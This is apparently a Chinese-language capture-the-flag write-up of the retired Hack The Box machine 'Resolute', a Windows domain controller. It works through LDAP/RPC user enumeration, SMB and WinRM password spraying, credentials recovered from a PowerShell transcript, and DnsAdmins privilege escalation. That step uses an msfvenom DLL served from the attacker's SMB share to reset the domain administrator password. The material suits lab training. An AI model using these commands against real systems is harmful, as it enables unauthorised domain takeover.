| 信息 | |
|---|---|
| IP | / |
| 难度 | Medium |
| 状态 | 退役 |
| 地址 | https://app.hackthebox.com/machines/220 |
| 价格 | 需要订阅 |
ldap,winrm,DNSAdmin组权限滥用提权
端口扫描
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1679/tcp filtered darcorp-lm
3072/tcp filtered csd-monitor
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
10633/tcp filtered unknown
19167/tcp filtered unknown
22109/tcp filtered unknown
23528/tcp filtered unknown
25324/tcp filtered unknown
30073/tcp filtered unknown
34122/tcp filtered unknown
43560/tcp filtered unknown
47001/tcp open winrm重点关注445,389,5985这些端口
ldap_389
扫描LDAP
nmap --script="ldap*" ip
或者使用windapsearch
python3 windapsearch.py --dc-ip 10.129.96.155 -U --full获得域名和一个密码DC=megabank,DC=local,Password set to Welcome123!
SMB,RPC
rpc空密码登陆
rpcclient -N -U "" ip
# 然后枚举用户名
enumdomusers获取到的用户名保存为username.txt
Administrator
Guest
krbtgt
DefaultAccount
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki使用crackmapexec进行SMB密码喷洒
crackmapexec smb 10.129.96.155 -u username.txt -p 'Welcome123!' --continue-on-success
SMB 10.129.96.155 445 RESOLUTE [+] megabank.local\melanie:Welcome123!获得一枚凭据melanie:Welcome123!
查看smb 共享文件夹(没什么有用的信息)
└─\ ✨ crackmapexec smb 10.129.96.155 -u melanie -p 'Welcome123!' --shares
SMB 10.129.96.155 445 RESOLUTE [+] Enumerated shares
SMB 10.129.96.155 445 RESOLUTE Share Permissions Remark
SMB 10.129.96.155 445 RESOLUTE ----- ----------- ------
SMB 10.129.96.155 445 RESOLUTE ADMIN$ Remote Admin
SMB 10.129.96.155 445 RESOLUTE C$ Default share
SMB 10.129.96.155 445 RESOLUTE IPC$ Remote IPC
SMB 10.129.96.155 445 RESOLUTE NETLOGON READ Logon server share
SMB 10.129.96.155 445 RESOLUTE SYSVOL READ Logon server share winrm_5984
对winrm进行密码喷洒
crackmapexec winrm 10.129.96.155 -u username.txt -p 'Welcome123!' --continue-on-success
WINRM 10.129.96.155 5985 RESOLUTE [+] megabank.local\melanie:Welcome123! (Pwn3d!)依旧是上面的那对凭据,使用evil-winrm进行连接
└─\ ✨ evil-winrm -i 10.129.96.155 -u melanie -p Welcome123!
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents> 家目录C:\Users\melanie\desktop下获得用户的flag
提权
横向移动
开启了PowerShell命令记录,是隐藏文件,dir -force可以显示隐藏文件
文件目录C:\PSTranscripts\20191203
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!获取到一对凭据ryan:Serv3r4Admin4cc123!,用户名我们已经得到了,将密码和之前的密码加入到文件password.txt
可以使用crackmapexec进行密码喷洒
方法同上
可以发现ryan是可以通过evil-winrm进行连接
└─\ ✨ evil-winrm -i 10.129.96.155 -u ryan -p Serv3r4Admin4cc123!纵向提权
https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups
EGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local GroupDnsAdmins组权限滥用
使用msfvenom生成payload
msfvenom -p windows/x64/exec cmd='net user administrator P@s5w0rd123! /domain' -f dll > da.dll开启一个smb server
└─\ ✨ impacket-smbserver shell $(pwd)在靶机上执行
cmd /c dnscmd localhost /config /serverlevelplugindll \\10.10.14.9\share\da.dll
sc.exe stop dns
sc.exe start dns管理员用户密码被改为P@s5w0rd123!
可以使用psexec.py进行连接
